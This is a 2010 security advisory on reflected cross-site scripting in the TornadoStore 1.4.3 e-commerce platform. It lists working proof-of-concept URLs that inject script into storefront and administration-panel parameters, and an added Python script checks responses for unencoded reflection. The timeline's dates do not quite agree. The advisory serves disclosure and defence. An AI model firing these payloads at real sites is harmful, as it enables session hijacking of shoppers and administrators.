
TornadoStore 1.4.3 XSS Vulnerability

Posted on 29 June 2010

====================================
TornadoStore 1.4.3 XSS Vulnerability
====================================

1. *Advisory Information*

Title: Multiple XSS in TornadoStore 1.4.3
Advisory ID: BONSAI-2010-0107
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php
Date published: 2010-06-29
Vendors contacted: TornadoStore
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-1328

3. *Software Description*

TornadoStore is an e-commerce platform. Its aim is to handle the complete commercialisation of a company's products and services through an online payment system [0].

4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into otherwise benign and trusted web sites. A cross-site scripting (XSS) attack occurs when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. For additional information, please read [1].

5. *Vulnerable packages*

Version <= 1.4.3

6. *Non-vulnerable packages*

TornadoStore developers informed us that all users should upgrade to the latest version of TornadoStore, which fixes this vulnerability. More information can be found here: http://www.tornadostore.com

7. *Credits*

This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).

8. *Technical Description*

8.1 A Reflected Cross Site Scripting vulnerability was found in the "tipo" and "destino" variables within the 'Services' section and in the "rubro" and "arti" variables in the 'Products' section. The application does not properly sanitise user input before echoing it into the page. Note the sequence in front of each <script> tag ("/>, "</a>, or a bare "): each payload first closes the attribute or element into which the parameter is reflected. The vulnerability can be triggered by clicking on any of the following URLs:

http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3

http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>

http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL

http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>

8.2 A Reflected Cross Site Scripting vulnerability was found in the TornadoStore Administration Panel, in the "descrip" and "tit" variables within the 'e-Commerce' section. Because these pages live under /control/, an attacker who gets a logged-in administrator to follow one of these links runs script in the administrator's session, which could lead to admin session hijacking.

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="

http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=

http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>

9. *Report Timeline*

- 2010-02-02: Vulnerabilities were identified.
- 2010-02-08: Vendor confirmed these vulnerabilities.
- 2010-02-16: Vendor contacted for an approximate fix release date. No specific answer given.
- 2010-03-10: Vendor fixed these vulnerabilities. No specific answer given.
- 2010-04-12: Vendor fixed this issue.
- 2010-05-29: The advisory BONSAI-2010-0107 is published.

# Inj3ct0r.com [2010-06-29]
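As an added worked example (editor's code, not part of the advisory and not TornadoStore's PHP), the check below parses the PoC URLs from section 8, pulls out the parameters that carry the `<script>` payload, and compares a constructed model of a page that echoes those parameters raw against the same page with HTML output encoding applied. `render_page` is an assumed stand-in for login_registrese.php3 and not the application's real template; `reflection_state` is the part you would run against a live response body.

```python
"""Reflection check for the TornadoStore 1.4.3 parameters named in BONSAI-2010-0107.

Example code added by the editor; it is not part of the advisory and not
TornadoStore's code.  render_page() is a constructed model of a page that
echoes request parameters into HTML; the PoC URLs are the advisory's own.
"""
import html
import re
from urllib.parse import parse_qsl, urlsplit

# PoC URLs copied from section 8 of the advisory (example.com is the advisory's placeholder host).
POC_URLS = [
    'http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3',
    'http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>',
    'http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL',
    'http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>',
    'http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="',
    'http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=',
    'http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>',
]

# Matches an opening script tag only, so "</script>" is not double-counted.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def injected_params(url):
    """Return the (name, value) pairs of a PoC URL whose value carries a <script> tag."""
    query = urlsplit(url).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if SCRIPT_TAG.search(value)]


def render_page(params, encode):
    """Constructed model (assumption, not the real template) of login_registrese.php3:
    each parameter is echoed into a hidden form field.  encode=False is the
    vulnerable pattern the advisory describes; encode=True routes every value
    through html.escape(quote=True), which is the fix for an attribute context."""
    esc = (lambda s: html.escape(s, quote=True)) if encode else (lambda s: s)
    fields = "".join(f'<input type="hidden" name="{esc(n)}" value="{esc(v)}"/>'
                     for n, v in params)
    return f'<form action="login_registrese.php3">{fields}</form>'


def reflection_state(body, value):
    """'unencoded' if the raw payload is in the response body (exploitable),
    'encoded' if only its HTML-escaped form is present, 'absent' otherwise."""
    if value in body:
        return "unencoded"
    if html.escape(value, quote=True) in body:
        return "encoded"
    return "absent"


def count_script_tags(body):
    """Number of opening <script> tags in a response body."""
    return len(SCRIPT_TAG.findall(body))


if __name__ == "__main__":
    for url in POC_URLS:
        for name, payload in injected_params(url):
            vuln = render_page([(name, payload)], encode=False)
            safe = render_page([(name, payload)], encode=True)
            print(f"{name:8s} raw: {reflection_state(vuln, payload)} "
                  f"({count_script_tags(vuln)} script tag) | "
                  f"escaped: {reflection_state(safe, payload)} "
                  f"({count_script_tags(safe)} script tags)")
```

Run as a script it prints one line per affected parameter; against a live response, `reflection_state` returning "unencoded" for the value you sent is the confirmation, and "encoded" is what the fixed version should give. The `<script` filter in `injected_params` only recognises the advisory's own payloads; a general check would send a unique canary containing `"`, `<` and `>` and look for it with `reflection_state`, since any of those three coming back raw in an attribute or text context is enough to break out.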
